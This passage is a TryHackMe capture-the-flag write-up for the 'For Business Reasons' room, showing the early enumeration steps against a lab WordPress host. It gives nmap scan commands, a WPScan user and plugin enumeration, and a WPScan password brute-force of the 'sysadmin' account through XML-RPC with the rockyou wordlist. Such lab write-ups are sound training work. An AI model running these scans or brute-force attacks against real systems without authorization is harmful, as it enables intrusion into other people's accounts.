This is a write-up for a TryHackMe’s room named “For Business Reasons”. This room is rated Hard
This room can be found here:- https://tryhackme.com/room/forbusinessreasons
Description:
In your network scan, you found an unknown VM…
You find a Host run by MilkCo*, run by a competent but not perfect team of sysadmins… But teams make mistakes.
Immature teams often do things like have all the elements of security like strict firewalls but then throw it all away by not understanding a technology or using shared passwords.
This is a hyper-realistic room. This room also features a difficult pivot.
Enumeration:
# Identify the list of services running on the target machine
sudo nmap -sS -Pn -T4 -p- 10.10.53.149
# Perform further information gathering on the open ports identified above — 80 in our case
sudo nmap -O -A -Pn -T4 -p80 10.10.53.149
Our NMAP scan reveals a WordPress site on port 80. Now lets run a WPScan to check if we can find any vulnerability.
WPScan
This will enumerate all plugins and users
wpscan --url 10.10.53.149 --enumerate u,ap
If a WPScan shows xml-rpc enabled on the website, whenever this file is enabled on any WordPress website, the website becomes vulnerable to brute-force attack. Here we have XML-RPC enabled and we got a user named “sysadmin”. Lets try to brute force this user’s password using WPScan only.
wpscan --url http://10.10.53.149 -U sysadmin -P /usr/share/wordlists/rockyou.txt